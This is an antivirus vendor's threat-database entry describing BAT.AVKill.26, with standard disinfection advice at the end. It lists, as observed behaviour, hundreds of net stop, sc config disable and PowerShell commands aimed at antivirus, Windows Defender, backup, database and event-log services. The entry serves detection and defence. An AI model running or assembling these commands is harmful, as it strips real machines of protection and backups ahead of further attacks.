BAT.AVKill.26

Added to the Dr.Web virus database: 2021-08-11

Virus description added:

Technical Information

Malicious functions
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
  • Windows Defender
Executes the following:
  • '<SYSTEM32>\net.exe' stop Alerter /y
  • '<SYSTEM32>\net.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net.exe' stop CSAdmin /y
  • '<SYSTEM32>\net.exe' stop CSAuth /y
  • '<SYSTEM32>\net.exe' stop CSDbSync /y
  • '<SYSTEM32>\net.exe' stop CSLog /y
  • '<SYSTEM32>\net.exe' stop CSMon /y
  • '<SYSTEM32>\net.exe' stop CSRadius /y
  • '<SYSTEM32>\net.exe' stop CSTacacs /y
  • '<SYSTEM32>\net.exe' stop Symantec /y
  • '<SYSTEM32>\net.exe' stop VGAuthService /y
  • '<SYSTEM32>\net.exe' stop SepMasterServiceMig /y
  • '<SYSTEM32>\net.exe' stop avbackup /y
  • '<SYSTEM32>\net.exe' stop MSSQL$NET2 /y
  • '<SYSTEM32>\net.exe' stop Net2ClientSvc /y
  • '<SYSTEM32>\net.exe' stop NetSvc /y
  • '<SYSTEM32>\net.exe' stop SQLAgent$NET2 /y
  • '<SYSTEM32>\net.exe' stop tpautoconnsvc /y
  • '<SYSTEM32>\net.exe' stop TPVCGateway /y
  • '<SYSTEM32>\net.exe' stop RSCDsvc /y
  • '<SYSTEM32>\net.exe' stop LRSDRVX /y
  • '<SYSTEM32>\net.exe' stop msvsmon90 /y
  • '<SYSTEM32>\net.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net.exe' stop IDriverT /y
  • '<SYSTEM32>\net.exe' stop bcrservice /y
  • '<SYSTEM32>\net.exe' stop sysdown /y
  • '<SYSTEM32>\net.exe' stop ERSvc /y
  • '<SYSTEM32>\net.exe' stop Eventlog /y
  • '<SYSTEM32>\net.exe' stop ImapiService /y
  • '<SYSTEM32>\net.exe' stop NetDDE /y
  • '<SYSTEM32>\net.exe' stop NtLmSsp /y
  • '<SYSTEM32>\net.exe' stop NtmsSvc /y
  • '<SYSTEM32>\net.exe' stop odserv /y
  • '<SYSTEM32>\net.exe' stop ose /y
  • '<SYSTEM32>\net.exe' stop SnowInventoryClient /y
  • '<SYSTEM32>\net.exe' stop TlntSvr /y
  • '<SYSTEM32>\net.exe' stop TSM /y
  • '<SYSTEM32>\net.exe' stop WinVNC4 /y
  • '<SYSTEM32>\net.exe' stop BlueStripeCollector /y
  • '<SYSTEM32>\net.exe' stop Cissesrv /y
  • '<SYSTEM32>\net.exe' stop CpqRcmc3 /y
  • '<SYSTEM32>\net.exe' stop gupdate /y
  • '<SYSTEM32>\net.exe' stop gupdatem /y
  • '<SYSTEM32>\net.exe' stop HealthService /y
  • '<SYSTEM32>\net.exe' stop NimbusWatcherService /y
  • '<SYSTEM32>\net.exe' stop ProLiantMonitor /y
  • '<SYSTEM32>\net.exe' stop SDD_Service /y
  • '<SYSTEM32>\net.exe' stop System /y
  • '<SYSTEM32>\net.exe' stop MSMQ /y
Miscellaneous
Executes the following:
  • '<SYSTEM32>\sc.exe' config SentinelAgent start= disabled
  • '<SYSTEM32>\sc.exe' config DB2MGMTSVC_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2REMOTECMD_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2DAS00 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2-0 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2INST2 start= disabled
  • '<SYSTEM32>\sc.exe' config IBMDataServerMgr start= disabled
  • '<SYSTEM32>\sc.exe' config IBMDSServer41 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2LICD_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$CITRIX_METAFRAME start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$CXDB start= disabled
  • '<SYSTEM32>\sc.exe' config swi_update start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamHvIntegrationSvc start= disabled
  • '<SYSTEM32>\sc.exe' config WRSVC start= disabled
  • '<SYSTEM32>\sc.exe' config W3Svc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamTransportSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamRESTSvc start= disabled
  • '<SYSTEM32>\sc.exe' config "McAfee SiteAdvisor Enterprise Service" start= disabled
  • '<SYSTEM32>\sc.exe' config DB2GOVERNOR_DB2COPY1 start= disabled
  • '<SYSTEM32>\sc.exe' config DB2 start= disabled
  • '<SYSTEM32>\sc.exe' config Alerter start= disabled
  • '<SYSTEM32>\sc.exe' config gupdate start= disabled
  • '<SYSTEM32>\sc.exe' config CpqRcmc3 start= disabled
  • '<SYSTEM32>\sc.exe' config Cissesrv start= disabled
  • '<SYSTEM32>\sc.exe' config BlueStripeCollector start= disabled
  • '<SYSTEM32>\sc.exe' config WinVNC4 start= disabled
  • '<SYSTEM32>\sc.exe' config WebClient start= disabled
  • '<SYSTEM32>\sc.exe' config TSM start= disabled
  • '<SYSTEM32>\sc.exe' config TlntSvr start= disabled
  • '<SYSTEM32>\sc.exe' config SnowInventoryClient start= disabled
  • '<SYSTEM32>\sc.exe' config ose start= disabled
  • '<SYSTEM32>\sc.exe' config odserv start= disabled
  • '<SYSTEM32>\sc.exe' config NtmsSvc start= disabled
  • '<SYSTEM32>\sc.exe' config NtLmSsp start= disabled
  • '<SYSTEM32>\sc.exe' config NetDDE start= disabled
  • '<SYSTEM32>\sc.exe' config ImapiService start= disabled
  • '<SYSTEM32>\sc.exe' config Eventlog start= disabled
  • '<SYSTEM32>\sc.exe' config ERSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamNFSSvc start= disabled
  • '<SYSTEM32>\sc.exe' config gupdatem start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamMountSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamDeploySvc start= disabled
  • '<SYSTEM32>\sc.exe' config SQLBrowser start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$VEEAMSQL2012 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$VEEAMSQL2008R2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLSafeOLRService start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SHAREPOINT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PROFXENGAGEMENT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PRACTTICEMGT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PRACTTICEBGC start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$BKUPEXEC start= disabled
  • '<SYSTEM32>\sc.exe' config sophossps start= disabled
  • '<SYSTEM32>\sc.exe' config SntpService start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SBSMONITORING start= disabled
  • '<SYSTEM32>\sc.exe' config SQLSERVERAGENT start= disabled
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY start= disabled
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamDeploymentService start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamCloudSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamCatalogSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamBrokerSvc start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamBackupSvc start= disabled
  • '<SYSTEM32>\sc.exe' config UI0Detect start= disabled
  • '<SYSTEM32>\sc.exe' config TrueKeyServiceHelper start= disabled
  • '<SYSTEM32>\sc.exe' config TrueKeyScheduler start= disabled
  • '<SYSTEM32>\sc.exe' config TrueKey start= disabled
  • '<SYSTEM32>\sc.exe' config tmlisten start= disabled
  • '<SYSTEM32>\sc.exe' config TmCCSF start= disabled
  • '<SYSTEM32>\sc.exe' config swi_update_64 start= disabled
  • '<SYSTEM32>\sc.exe' config swi_service start= disabled
  • '<SYSTEM32>\sc.exe' config swi_filter start= disabled
  • '<SYSTEM32>\sc.exe' config svcGenericHost start= disabled
  • '<SYSTEM32>\sc.exe' config SstpSvc start= disabled
  • '<SYSTEM32>\sc.exe' config SQLWriter start= disabled
  • '<SYSTEM32>\sc.exe' config VeeamEnterpriseManagerSvc start= disabled
  • '<SYSTEM32>\sc.exe' config HealthService start= disabled
  • '<SYSTEM32>\sc.exe' config NimbusWatcherService start= disabled
  • '<SYSTEM32>\sc.exe' config ProLiantMonitor start= disabled
  • '<SYSTEM32>\net1.exe' stop CSAdmin /y
  • '<SYSTEM32>\net1.exe' stop ccSetMgr /y
  • '<SYSTEM32>\net1.exe' stop ccEvtMgr /y
  • '<SYSTEM32>\net1.exe' stop bcrservice /y
  • '<SYSTEM32>\net1.exe' stop System /y
  • '<SYSTEM32>\net1.exe' stop sysdown /y
  • '<SYSTEM32>\net1.exe' stop SDD_Service /y
  • '<SYSTEM32>\net1.exe' stop CSDbSync /y
  • '<SYSTEM32>\net1.exe' stop CSAuth /y
  • '<SYSTEM32>\net1.exe' stop HealthService /y
  • '<SYSTEM32>\net1.exe' stop gupdatem /y
  • '<SYSTEM32>\net1.exe' stop gupdate /y
  • '<SYSTEM32>\net1.exe' stop CpqRcmc3 /y
  • '<SYSTEM32>\net1.exe' stop Cissesrv /y
  • '<SYSTEM32>\net1.exe' stop BlueStripeCollector /y
  • '<SYSTEM32>\net1.exe' stop WinVNC4 /y
  • '<SYSTEM32>\net1.exe' stop ProLiantMonitor /y
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Set-MpPreference -DisableRealtimeMonitoring $true
  • '<SYSTEM32>\net1.exe' stop CSLog /y
  • '<SYSTEM32>\net1.exe' stop MSMQ /y
  • '<SYSTEM32>\net1.exe' stop IDriverT /y
  • '<SYSTEM32>\net1.exe' stop msvsmon90 /y
  • '<SYSTEM32>\net1.exe' stop LRSDRVX /y
  • '<SYSTEM32>\net1.exe' stop RSCDsvc /y
  • '<SYSTEM32>\net1.exe' stop TPVCGateway /y
  • '<SYSTEM32>\net1.exe' stop tpautoconnsvc /y
  • '<SYSTEM32>\net1.exe' stop SQLAgent$NET2 /y
  • '<SYSTEM32>\net1.exe' stop NetSvc /y
  • '<SYSTEM32>\net1.exe' stop Net2ClientSvc /y
  • '<SYSTEM32>\net1.exe' stop MSSQL$NET2 /y
  • '<SYSTEM32>\net1.exe' stop avbackup /y
  • '<SYSTEM32>\net1.exe' stop SepMasterServiceMig /y
  • '<SYSTEM32>\net1.exe' stop VGAuthService /y
  • '<SYSTEM32>\net1.exe' stop Symantec /y
  • '<SYSTEM32>\net1.exe' stop CSTacacs /y
  • '<SYSTEM32>\net1.exe' stop CSRadius /y
  • '<SYSTEM32>\net1.exe' stop TSM /y
  • '<SYSTEM32>\net1.exe' stop NimbusWatcherService /y
  • '<SYSTEM32>\net1.exe' stop TlntSvr /y
  • '<SYSTEM32>\net1.exe' stop SnowInventoryClient /y
  • '<SYSTEM32>\net1.exe' stop ose /y
  • '<SYSTEM32>\sc.exe' config CSAuth start= disabled
  • '<SYSTEM32>\sc.exe' config VGAuthService start= disabled
  • '<SYSTEM32>\sc.exe' config Symantec start= disabled
  • '<SYSTEM32>\sc.exe' config CSTacacs start= disabled
  • '<SYSTEM32>\sc.exe' config CSRadius start= disabled
  • '<SYSTEM32>\sc.exe' config CSMon start= disabled
  • '<SYSTEM32>\sc.exe' config CSLog start= disabled
  • '<SYSTEM32>\sc.exe' config CSDbSync start= disabled
  • '<SYSTEM32>\sc.exe' config CSAdmin start= disabled
  • '<SYSTEM32>\sc.exe' config avbackup start= disabled
  • '<SYSTEM32>\sc.exe' config ccSetMgr start= disabled
  • '<SYSTEM32>\sc.exe' config ccEvtMgr start= disabled
  • '<SYSTEM32>\sc.exe' config bcrservice start= disabled
  • '<SYSTEM32>\sc.exe' config GoogleChromeElevationService start= disabled
  • '<SYSTEM32>\sc.exe' config System start= disabled
  • '<SYSTEM32>\sc.exe' config sysdown start= disabled
  • '<SYSTEM32>\sc.exe' config SDD_Service start= disabled
  • '<SYSTEM32>\sc.exe' config SNAC start= disabled
  • '<SYSTEM32>\sc.exe' config Net2ClientSvc start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$NET2 start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$NET2 start= disabled
  • '<SYSTEM32>\sc.exe' config SepMasterServiceMig start= disabled
  • '<SYSTEM32>\net1.exe' stop odserv /y
  • '<SYSTEM32>\net1.exe' stop NtmsSvc /y
  • '<SYSTEM32>\net1.exe' stop NtLmSsp /y
  • '<SYSTEM32>\net1.exe' stop NetDDE /y
  • '<SYSTEM32>\net1.exe' stop ImapiService /y
  • '<SYSTEM32>\net1.exe' stop Eventlog /y
  • '<SYSTEM32>\net1.exe' stop ERSvc /y
  • '<SYSTEM32>\net1.exe' stop Alerter /y
  • '<SYSTEM32>\sc.exe' config MSMQ start= disabled
  • '<SYSTEM32>\sc.exe' config IDriverT start= disabled
  • '<SYSTEM32>\sc.exe' config msvsmon90 start= disabled
  • '<SYSTEM32>\sc.exe' config LRSDRVX start= disabled
  • '<SYSTEM32>\sc.exe' config RSCDsvc start= disabled
  • '<SYSTEM32>\sc.exe' config AdobeARMservice start= disabled
  • '<SYSTEM32>\sc.exe' config TPVCGateway start= disabled
  • '<SYSTEM32>\sc.exe' config tpautoconnsvc start= disabled
  • '<SYSTEM32>\sc.exe' config NetSvc start= disabled
  • '<SYSTEM32>\net1.exe' stop CSMon /y
  • '<SYSTEM32>\sc.exe' config SMTPSvc start= disabled
  • '<SYSTEM32>\sc.exe' config MySQL57 start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Agent" start= disabled
  • '<SYSTEM32>\sc.exe' config "Enterprise Client Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Acronis VSS Provider" start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$CITRIX_METAFRAME start= disabled
  • '<SYSTEM32>\sc.exe' config "SQL Backups" start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PROD start= disabled
  • '<SYSTEM32>\sc.exe' config "Zoolz 2 Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos AutoUpdate Service" start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLServerADHelper start= disabled
  • '<SYSTEM32>\sc.exe' config msftesql$PROD start= disabled
  • '<SYSTEM32>\sc.exe' config NetMsmqActivator start= disabled
  • '<SYSTEM32>\sc.exe' config ESHASRV start= disabled
  • '<SYSTEM32>\sc.exe' config ekrn start= disabled
  • '<SYSTEM32>\sc.exe' config EhttpSrv start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SOPHOS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SOPHOS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$PROD start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Clean Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Device Control Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos File Scanner Service" start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecAgentAccelerator start= disabled
  • '<SYSTEM32>\sc.exe' config ARSM start= disabled
  • '<SYSTEM32>\sc.exe' config Antivirus start= disabled
  • '<SYSTEM32>\sc.exe' config AcrSch2Svc start= disabled
  • '<SYSTEM32>\sc.exe' config AcronisAgent start= disabled
  • '<SYSTEM32>\sc.exe' config "Veeam Backup Catalog Data Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Symantec System Recovery" start= disabled
  • '<SYSTEM32>\sc.exe' config "McAfeeDLPAgentService" start= disabled
  • '<SYSTEM32>\sc.exe' config "SQLsafe Filter Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "SQLsafe Backup Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Web Control Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos System Protection Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Safestore Service" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Message Router" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos MCS Client" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos MCS Agent" start= disabled
  • '<SYSTEM32>\sc.exe' config "Sophos Health Service" start= disabled
  • '<SYSTEM32>\sc.exe' config AVP start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecAgentBrowser start= disabled
  • '<SYSTEM32>\sc.exe' config klnagent start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$SQLEXPRESS start= disabled
  • '<SYSTEM32>\sc.exe' config SSISTELEMETRY130 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLLaunchpad$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config EPUpdateServicestart= disabled
  • '<SYSTEM32>\sc.exe' config EPSecurityServicestart= disabled
  • '<SYSTEM32>\sc.exe' config BrokerInfrastructurestart= disabled
  • '<SYSTEM32>\sc.exe' config BITSstart= disabled
  • '<SYSTEM32>\sc.exe' config epag start= disable
  • '<SYSTEM32>\sc.exe' config MsDtsServer130 start= disabled
  • '<SYSTEM32>\sc.exe' config EPIntegrationService start= disable
  • '<SYSTEM32>\sc.exe' config epredline start= disable
  • '<SYSTEM32>\sc.exe' config EPUpdateService start= disable
  • '<SYSTEM32>\sc.exe' config EPSecurityService start= disable
  • '<SYSTEM32>\sc.exe' config TmPfw start= disable
  • '<SYSTEM32>\sc.exe' config SentinelStaticEngine start= disabled
  • '<SYSTEM32>\sc.exe' config LogProcessorService start= disabled
  • '<SYSTEM32>\sc.exe' config SentinelHelperService start= disabled
  • '<SYSTEM32>\sc.exe' config EPProtectedService start= disable
  • '<SYSTEM32>\sc.exe' config SQLTELEMETRY$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config SQLAgent$EPOSERVER start= disabled
  • '<SYSTEM32>\sc.exe' config wbengine start= disabled
  • '<SYSTEM32>\sc.exe' config kavfsslp start= disabled
  • '<SYSTEM32>\sc.exe' config KAVFSGT start= disabled
  • '<SYSTEM32>\sc.exe' config KAVFS start= disabled
  • '<SYSTEM32>\sc.exe' config mfefire start= disabled
  • '<SYSTEM32>\sc.exe' config "avast! Antivirus" start= disabled
  • '<SYSTEM32>\sc.exe' config aswBcc start= disabled
  • '<SYSTEM32>\sc.exe' config "Avast Business Console Client Antivirus Service" start= disabled
  • '<SYSTEM32>\sc.exe' config mfewc start= disabled
  • '<SYSTEM32>\sc.exe' config Telemetryserver start= disabled
  • '<SYSTEM32>\sc.exe' config WinDefend start= disabled
  • '<SYSTEM32>\sc.exe' config WdNisSvc start= disabled
  • '<SYSTEM32>\sc.exe' config MCAFEETOMCATSRV530 start= disabled
  • '<SYSTEM32>\sc.exe' config MCAFEEEVENTPARSERSRV start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$EPOSERVER start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$ITRIS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SQLEXPRESS start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecDeviceMediaService start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecJobEngine start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecManagementService start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SHAREPOINT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$SBSMONITORING start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLServerADHelper100 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLSERVER start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$VEEAMSQL2008R2 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SHAREPOINT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$SBSMONITORING start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLFDLauncher start= disabled
  • '<SYSTEM32>\sc.exe' config Smcinst start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQLServerOLAPService start= disabled
  • '<SYSTEM32>\sc.exe' config ShMonitor start= disabled
  • '<SYSTEM32>\sc.exe' config SepMasterService start= disabled
  • '<SYSTEM32>\sc.exe' config SDRSVC start= disabled
  • '<SYSTEM32>\sc.exe' config SAVService start= disabled
  • '<SYSTEM32>\sc.exe' config SAVAdminService start= disabled
  • '<SYSTEM32>\sc.exe' config SamSs start= disabled
  • '<SYSTEM32>\sc.exe' config sacsvr start= disabled
  • '<SYSTEM32>\sc.exe' config RESvc start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config ReportServer start= disabled
  • '<SYSTEM32>\sc.exe' config POP3Svc start= disabled
  • '<SYSTEM32>\sc.exe' config PDVFSService start= disabled
  • '<SYSTEM32>\sc.exe' config OracleClientCache80 start= disabled
  • '<SYSTEM32>\sc.exe' config ntrtscan start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PROFXENGAGEMENT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$VEEAMSQL2012 start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PRACTTICEBGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$PRACTICEMGT start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$ECWDB2 start= disabled
  • '<SYSTEM32>\sc.exe' config FA_Scheduler start= disabled
  • '<SYSTEM32>\sc.exe' config McAfeeEngineService start= disabled
  • '<SYSTEM32>\sc.exe' config MBEndpointAgent start= disabled
  • '<SYSTEM32>\sc.exe' config MBAMService start= disabled
  • '<SYSTEM32>\sc.exe' config masvc start= disabled
  • '<SYSTEM32>\sc.exe' config macmnsvc start= disabled
  • '<SYSTEM32>\sc.exe' config IMAP4Svc start= disabled
  • '<SYSTEM32>\sc.exe' config IISAdmin start= disabled
  • '<SYSTEM32>\sc.exe' config EsgShKernel start= disabled
  • '<SYSTEM32>\sc.exe' config McAfeeFrameworkMcAfeeFramework start= disabled
  • '<SYSTEM32>\sc.exe' config EraserSvc11710 start= disabled
  • '<SYSTEM32>\sc.exe' config EPUpdateService start= disabled
  • '<SYSTEM32>\sc.exe' config EPSecurityService start= disabled
  • '<SYSTEM32>\sc.exe' config DCAgent start= disabled
  • '<SYSTEM32>\sc.exe' config bedbg start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecVSSProvider start= disabled
  • '<SYSTEM32>\sc.exe' config BackupExecRPCService start= disabled
  • '<SYSTEM32>\sc.exe' config SmcService start= disabled
  • '<SYSTEM32>\sc.exe' config McTaskManager start= disabled
  • '<SYSTEM32>\sc.exe' config McShield start= disabled
  • '<SYSTEM32>\sc.exe' config mfevtp start= disabled
  • '<SYSTEM32>\sc.exe' config McAfeeFramework start= disabled
  • '<SYSTEM32>\sc.exe' config MSSQL$BKUPEXEC start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$TPSAMA start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$TPS start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$SYSTEM_BGC start= disabled
  • '<SYSTEM32>\sc.exe' config MSOLAP$SQL_2008 start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeSRS start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeSA start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeMTA start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeMGMT start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeIS start= disabled
  • '<SYSTEM32>\sc.exe' config MSExchangeES start= disabled
  • '<SYSTEM32>\sc.exe' config MsDtsServer110 start= disabled
  • '<SYSTEM32>\sc.exe' config MsDtsServer100 start= disabled
  • '<SYSTEM32>\sc.exe' config MsDtsServer start= disabled
  • '<SYSTEM32>\sc.exe' config mozyprobackup start= disabled
  • '<SYSTEM32>\sc.exe' config MMS start= disabled
  • '<SYSTEM32>\sc.exe' config mfemms start= disabled
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Uninstall-WindowsFeature -Name Windows-Defender

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and any removable media you use.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Boot your smartphone or tablet in safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.
